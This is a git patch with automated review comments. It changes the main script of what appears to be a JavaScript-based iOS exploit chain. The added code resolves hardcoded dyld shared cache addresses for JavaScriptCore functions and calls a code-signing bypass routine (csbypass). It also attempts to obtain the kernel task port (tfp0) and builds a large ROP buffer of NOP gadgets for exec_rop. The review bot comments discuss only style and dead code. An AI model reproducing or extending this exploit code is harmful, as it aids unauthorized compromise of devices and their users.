From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001
From: spv420
Date: Tue, 31 May 2022 19:51:14 -0400
Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore
---
 src/js/main.js | 93 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 92 insertions(+), 1 deletion(-)
(limited to 'src/js/main.js')
diff --git a/src/js/main.js b/src/js/main.js
index 7021ab1..c6ceba0 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -19,6 +19,8 @@ var PROT_EXEC = 0x4;
 var MAP_PRIVATE = 0x2;
 var MAP_ANON = 0x1000;
+var victim = {a: 13.37};
+
 /*
 * leftover shit from jsc_fun, used to be using `log`
 */
@@ -32,6 +34,10 @@ try {
 puts = function (){};
 }
+var JSStringCreateWithUTF8CString = 0x239f9d0d;
+var JSObjectGetProperty = 0x239fa411;
+var JSContextGetGlobalObject = 0x239f8dfd;
+
 function main() {
 /*
 * get slide and calculate slid base
@@ -48,6 +54,8 @@ function main() {
 init_sptr_heap();
+
+ scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44);
+
 puts("we out here");
 puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
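Review bot: The three `JS*` globals in the `@@ -32,6 +34,10 @@` hunk are raw unslid addresses that are only valid for the one dyld shared cache build they were read from, but no comment records that build or their provenance, so the `sym_cache` entries derived from them in the last hunk would silently resolve to wrong locations on any other build. Add a note such as `// unslid dyld_shared_cache addresses; valid only for the build they were dumped from` above the group. Because the same identifiers are reused verbatim as the `sym_cache` string keys, a distinguishing suffix (for example `JSObjectGetPropertyAddr`) would also make it obvious at the call site that these are numbers, not functions.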
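Review bot: The `scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44);` line in the `@@ -48,6 +54,8 @@` hunk is an uncommented probe left in the live path of main(), sitting between `init_sptr_heap()` and the `puts` calls that use the script's own output helpers. If it is meant to stay as a check that `scall` forwards four integer arguments, say so, e.g. `// sanity check: scall should forward all four integer args`; otherwise it is debug residue and belongs behind a flag or out of the commit. main() starts and ends outside this hunk.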
@@ -56,9 +64,92 @@ function main() {
 printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
 printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
- var tfp0 = get_kernel_task();
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+
+ prep_shit();
+ large_buf[0] = 0x41424344;
+ printf("%x\n", read_u32(large_buf_ptr));
+
+ csbypass();
+
+ return;
+
+ var tfp0 = get_kernel_task();
+ printf("tfp0=%x\n", tfp0);
+
+ return;
+
+ printf("dead?\n");
+ var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
+ printf("dead? %x\n", string_ref);
+ var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ printf("dead? %x\n", global_object);
+ var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ printf("dead?\n");
+
+ printf("%x\n", jsobj_addr);
+// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+ victim.target = parent;
+ printf("%x\n", read_u32(jsobj_addr + 0x18));
+// printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
+// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+
+ /*
+ UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL"
+ message:@"Dee dee doo doo."
+ delegate:self
+ cancelButtonTitle:@"OK"
+ otherButtonTitles:nil];
+ [alert show];
+ */
+
+ return;
+
+ var rop_buf = new Array();
+ var nop = (0x781a | 1) + slid;
+ var zero_arr = [].slice.call(u32_to_u8x4(0));
+ var nop_arr = [].slice.call(u32_to_u8x4(nop));
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(nop);
+ for (var i = 0; i < 0x40000; i++) {
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(nop);
+ if (i % 0x1000 == 0) {
+ printf("%x\n", i);
+ }
+ }
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0x41414141);
+
+ printf("gen'd buf\n");
+
+// printf("%s\n", rop_buf[0].toString(16));
+
+ printf("exec'ing\n");
+ exec_rop(rop_buf);
+ printf("done\n");
+
+// var tfp0 = get_kernel_task();
+
+// printf("tfp0=%x\n", tfp0);
 return;
-- cgit v1.2.3
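Review bot: Everything after the `return;` that follows `csbypass()` is unreachable, yet the hunk keeps two further `return;` statements and roughly seventy lines of abandoned experiments behind it, so the live path of main() is buried in code that never runs. Some of that dead code would not even survive being re-enabled: the `NULL` argument in the `JSObjectGetProperty` call and the `parent` in `victim.target = parent;` are not defined anywhere in the hunk and would throw a ReferenceError unless the file declares them elsewhere, and `zero_arr` and `nop_arr` are computed but never read. Moving each experiment into its own named function, or deleting it since git keeps the history, would leave main() readable, and the commented-out Objective-C `UIAlertView` block inside this JavaScript file is better replaced by a one-line `// TODO:` note. The enclosing main() begins and ends outside this hunk.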